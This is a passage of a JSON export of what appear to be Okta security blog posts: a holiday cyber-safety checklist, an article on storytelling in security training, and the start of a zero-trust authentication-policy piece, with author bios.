more\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" about our long-term initiative to lead the industry in the fight against Identity attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Check out our Security Culture team’s cyber-safety checklist to help keep your digital Identity safe this holiday season.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cyber-Safety Checklist\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, we believe in sharing valuable, actionable security insights because we \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Love our Customers\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\". As the holiday season approaches and scams continue to emerge, here are five easy tips from Okta’s Security Culture team to help keep you, your data, and your devices safe and secure.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Monitor your accounts\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Catching suspicious or fraudulent charges early gives you a greater chance of restoring lost funds, preventing further compromise and also halting unauthorized spending.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Check your bank accounts and credit cards regularly to validate intentional transactions and their totals. Most providers allow you to set up alerts and/or multi-factor authentication (MFA) for additional protection. In practicing good credit hygiene, you should also consider:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Requesting a (usually free) copy of your credit report.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Signing up to a credit monitoring service.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Check your tech\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Vulnerabilities in both outdated software applications and operating systems are more likely to be exploited by threat actors in order to gain unauthorized access to your accounts.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend always using up-to-date devices, especially when performing financial transactions such as online banking or making credit card purchases. Some devices and/or applications allow you to turn on automatic updates to avoid having to manually check for software updates in the future.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Click carefully\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Social media ads, emails and text messages can take you to fake websites that look like the real thing. To stay safe, always type the official website URL directly into your browser instead of clicking on links.\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://okta.com/au/identity-101/social-engineering/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Phishing and smishing\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" are getting increasingly sophisticated and can be hard to tell apart from messages from \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2024/okta-social-engineering-report-response-and-recommendation\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"trusted sources\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Staying cyber-safe means staying updated; numerous organizations and retailers publish best practices they recommend for leveraging their products, services or tools.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. Shop smart\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When taking advantage of holiday deals, make sure your credit card information gets securely encrypted.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A good start could be to check the webpage URL, ensuring that it begins with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/identity-101/http-vs-https/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"HTTPS\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (and not HTTP) before you checkout and enter your sensitive data. It’s good practice to use reputable sites and create an account, enabling multi-factor authentication (MFA) to authenticate for future purchases. In general, it’s a best practice to not have sites save your credit card information, and when able using session-based payments (such as Apple Pay) can provide additional security.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. Protect your accounts\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Instead of traditional passwords, we recommend the use of\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/identity-101/password-vs-passphrase/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\" passphrases\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for additional assurance. An eight-character password can be quickly cracked by a threat actor; a strong 12-character passphrase could take years. Also, consider using a password manager (such as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/products/okta-personal/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Personal\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\") to safely and securely store your account credentials.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It is best practice to enable \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/identity-101/why-mfa-is-everywhere/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"multi-factor authentication (MFA)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" wherever possible. Given \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.verizon.com/business/resources/reports/dbir/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"81%\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of breaches involve stolen or weak credentials, use a\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/blog/2023/10/passkeys-101-what-they-are-and-how-they-will-replace-passwords/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"passkey\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" where available. Passkeys are proven to be significantly stronger than standard passwords. We recommend using biometrics such as FaceID or Fingerprint to log in and authenticate to your commonly used sites and services.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A Culture of Cybersecurity\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today’s digital world has evolved tremendously in enabling our online reach, which in turn can expand the potential for impact. Being vigilant to online scams shouldn’t just be a priority over the holiday season. Here at Okta, we promote a culture of cybersecurity all-year-round and recommend building routine habits around our recommendations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Always Secure, Always On\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/04/the-story-behind-oktas-values/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"corporate value\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" reflects our ongoing commitment to make every employee an owner of security. With \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.verizon.com/business/resources/reports/2024-dbir-data-breach-investigations-report.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"68%\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of breaches involving a human element, a strong security culture is more important than ever. Okta’s culture of cybersecurity is a core value; \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/08/how-okta-fosters-a-security-culture/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"learn more\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" about our foundational pillars and how we foster our security culture.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"At Okta, we believe in sharing valuable, actionable security insights because we Love our Customers. Check out our Security Culture team’s cyber-safety checklist to help keep your digital Identity safe this holiday season."},"updatedAt":"2024-12-19T20:59:07.991Z","secAuthor":[{"id":"2f88c41e-3abf-5fcc-9a06-9ed78081f8e2","bio":{"bio":"Carmen Girardin is a Manager, Security Communications at Okta. Backed by over a decade of experience in the fintech sector, Carmen is a proficient technical writer with domain expertise in Identity and Access Management (IAM). She is passionate about delivering engaging, timely customer communications on the cybersecurity ecosystem and the evolving threat landscape, to help our customers gain the most value from Okta. Carmen spends her downtime traveling, thrifting for treasures and reading.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg"},"name":"Carmen Girardin","jobTitle":"Manager, Security Communications","slug":"/hackers/carmen-girardin","node_locale":"en"},{"id":"fe6977e6-3784-5b01-9c68-5198f34e986d","bio":{"bio":"Okta's Security Culture team is responsible for championing a world-class security culture via education, trainings, and awareness to make the internet safer both through and for our global employees and our growing customer base.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta Security Culture","jobTitle":null,"slug":"/hackers/security-culture","node_locale":"en"}]},{"slug":"/articles/security-education-storytelling","id":"f64ec9fa-08d1-5438-8563-c176cce5f285","title":"Security Education Through the Art of Storytelling","date":"2024-09-05T08:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In today's digital world, cybersecurity isn't just a technical issue, it's a human one. At Okta, we've taken a fresh approach to security education by leveraging a tool as old as humanity itself - storytelling. We aim to make security education effective, engaging, and memorable by weaving narratives into our training sessions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is Storytelling?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Storytelling is more than just a method of communication; it is a profound way to connect with people, share experiences, and influence thoughts and emotions. As Jimmy Neil Smith, Director of the International Storytelling Center, puts it: “We are all storytellers. We all live in a network of stories. There isn’t a stronger connection between people than storytelling.”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This connection is why storytelling is such a powerful tool in education. We aren't just relaying information when we tell a story - we create an emotional experience. This emotional investment helps people better remember the lessons long after the session is over.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Elements of a Good Story\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A compelling story has several key elements:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Characters:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Every story needs a hero and, often, a villain. In the context of cybersecurity, the hero could be the employee who spots a vulnerability during a code review. At the same time, the villain might be the adversary trying to breach the system.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Hero’s Journey:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" This is the narrative arc where the hero faces a challenge, overcomes obstacles, and emerges victorious (or learns a valuable lesson in defeat).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Conflict and Resolution:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" At the core of any good story is conflict. It might be a breach attempt, a security flaw, or risky behavior that needs correcting. The resolution is how the characters (or the audience) learn to address and resolve these issues.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Lessons Learned:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" What should the audience take away from the story? This could be practical advice, a change in perspective, or a call to action.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, we apply these elements to our security education by crafting relatable scenarios that resonate with our audience. We don’t just list the Open Source Foundation for Application Security (OWASP) Top 10 vulnerabilities; we tell the story of the \\\"Okta Top 10” – the Top 10 vulnerabilities we see through code reviews and other methods. We weave in real-world examples and metaphors that bring these abstract concepts to life.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How to Tell a Story in Security Training\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Know Your Audience:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Understanding your audience's background, expertise, and interests is crucial. At Okta, we avoid generic examples that don’t resonate with our employees. Instead, we use examples found in our codebase to make security concepts relatable.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Pull Them in with Emotional Connections:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Start with a relatable scenario. Use personal stories, show empathy for their challenges, and highlight how security issues impact them directly.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Make Them Care:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" To drive the point home, it’s essential to illustrate the real-world consequences of security lapses. Show both the adverse outcomes of ignoring best practices and the positive results of adhering to them.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Give Them Something to Remember:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Whether it’s a humorous anecdote, a dramatic story arc, or a surprising twist, the goal is to leave the audience with a memorable takeaway. This helps reinforce the lessons learned and encourages better security practices.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Storytelling in Action at Okta\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When I joined Okta, one of my first tasks was overhauling our secure code training. We decided to shift our focus from traditional lectures to storytelling, using elements from gaming, sci-fi, and fantasy to create a narrative that would resonate with our tech audience.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We created fictional characters, like \\\"The Devs,\\\" representing our product development team members and placing them in scenarios that mimic real-world security challenges. These diverse characters and grounded-in-reality scenarios made them more relatable and effective in conveying the importance of security practices.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For instance, one of our training modules depicted a hacker attempting to infiltrate a secure area, like trying to gain unauthorized access to a club. Using this metaphor, we could visually demonstrate authentication issues and privilege escalation in an engaging and educational way.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Why Storytelling Works\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Good stories surprise us, make us think and feel, and stick in our minds long after we've heard them. In cybersecurity training, this means our employees are more likely to remember the lessons we teach and apply them in their daily work.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We are continuously building on this approach, integrating storytelling deeper into our security culture, making our educational materials informative, and reflecting our unique culture at Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By embracing storytelling, we transform our security training from a mundane task into a memorable experience that fosters a culture of security awareness throughout the organization.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Conclusion\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Storytelling is a powerful tool in security education. It makes training more engaging, relatable, and memorable, helping employees not just learn about security best practices but also internalize them. At Okta, we have heard from our employees that they find the training relatable and enjoyable. We are also seeing a higher level of on-time completion rates than we did with previous trainings. We're committed to using storytelling to create a stronger security culture - one that empowers every team member to live our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/04/the-story-behind-oktas-values/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"company value\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of Aways Secure, Always On.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Learn More\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Security Education team will present at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/oktane\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Oktane\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on “\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/oktane/sessions/?tab.allsessionsfilter=1722375948750001fBW3&search=Building%20a%20Robust%20Security%20Education%20Program#/session/1722960641157001RDbO\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Building a Robust Security Education Program\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"” in October. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For more on storytelling, please watch my \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://youtu.be/KJ920WIpHHU\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"keynote\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" address at the CloudNative SecurityCon in July. I will also be leading two sessions on Security Education Through the Art of Storytelling at the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://conference.ewf-usa.com/event/c76cd0b2-f7f7-4e49-8ca2-dbded0406e07/summary\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"EWF (Executive Women's Forum) Annual Conference\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on October 23, 2024.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"In today's digital world, cybersecurity isn't just a technical issue, it's a human one. "},"updatedAt":"2024-09-05T16:28:27.869Z","secAuthor":[{"id":"a21c5c8e-d13f-5468-9761-0986a3394d27","bio":{"bio":"Ann Wallace is the Director of Product Security Education at Okta. She shares her journey of transforming security education through the art of storytelling. Prior to Okta, Ann held security leadership roles at Google, Nike, and Shopify. She is also on the Board of Directors for WiCyS Oregon. Ann has spoken globally at conferences on Security Education, Women in Tech, and Cloud and Container Security. Ann can also be found trail running around the PNW with her dog Cedar.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2qR594svVD13Nv9d5GRkCe/720d8746d5a87c62f24e4c53c5eff4e8/Screenshot_2024-09-03_at_1.50.39_PM.png"},"name":"Ann Wallace","jobTitle":"Director of Product Security","slug":"/hackers/ann-wallace","node_locale":"en"}]},{"slug":"/articles/2023/03/setting-right-levels-assurance-zero-trust","id":"8a7eab02-4048-5fa1-8bd0-707e6102b03e","title":"Setting the Right Levels of Assurance for Zero Trust","date":"2023-03-31T16:10:06+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine (OIE) is an incredibly powerful platform. What other platform allows you to have this level of security, granularity and control?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“Only allow access to a highly sensitive application if the user authenticates with multiple authenticators that are at least one phishing-resistant, and only from a corporate-managed device with a strong EDR posture score.”\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The more sensitive an application is, the more security context we might seek to verify to ensure the access is legitimate. For organizations with many applications, each with varying levels of sensitivity, it’s traditionally been difficult to create sign-in policies that account for the high assurance sensitive applications require, without over-complicating access to less sensitive resources. The scenario we should try to avoid is expecting end-users to re-authenticate using passwords and OTP codes multiple times throughout the day as they navigate the resources they require to do their job.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With Okta Identity Engine, Okta provides shareable authentication policies at the resource-level, and a contextual approach to access. Authentication policies give administrators an ability to define contextual access for each app or for groups of applications. Policy rules can evaluate identity context (group membership), device context (whether a device is known, registered or managed), device posture (the health of the device), network context (the network origin of the request), and patterns of previous user behavior. This provides the required granularity to secure access to applications based on risk.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This flexible framework is key in helping organizations achieve their required \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3-Implementation-Resources/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Levels of Assurance (LOA)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Once the desired LOA threshold is met, those organizations can confidently say that the right users have the right level of access to the right resources at the right time. LOA is a major component of a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/zero-trust/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Zero Trust architecture\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and helps ensure all access is verified, rather than providing implicit trust. OIE can be a foundational tool to meet \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.whitehouse.gov/wp-content/uploads/2022/01/M-22-09.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"OMB guidance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (.pdf) on moving to Zero Trust security principles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Context Considerations for Authentication Policies:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/policies/about-app-sign-on-policies.htm?cshid=ext-about-asop\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authentication Policies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in Okta Identity Engine verify that users signing in to an application meet specific conditions. The policy engine enforces factor requirements based on those conditions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authentication Risk\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authentication Risk is a measure of how much a request to Okta deviates from a previously established pattern of behavior for a user. Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/oie-risk-behavior-eval.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"risk engine\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" evaluates a range of contexts including IP history, behaviorial information about the user making the sign-in request, previous successful and failed sign-in attempts and routing information associated with the request.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Low Risk Auth\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": authentication that does not deviate from previous user’s behavior (same IP/device/location, etc.)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Medium Risk Auth\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": authentication that slightly deviates from a previous user’s behavior (new city, new device, etc.)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"High Risk Auth\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": authentication that highly deviates from a previous user’s behavior (impossible travel and new device, first time user login, etc.)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NB: Risk-based Authentication requires an org to be licensed for Adaptive Multifactor 